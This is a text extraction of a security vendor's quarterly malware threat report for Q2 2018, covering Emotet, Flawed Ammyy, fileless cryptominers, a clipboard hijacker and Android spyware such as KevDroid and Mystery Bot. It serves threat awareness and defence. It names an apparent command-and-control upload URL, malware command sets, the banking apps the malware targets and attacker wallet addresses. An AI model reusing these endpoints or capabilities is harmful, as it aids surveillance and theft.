The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
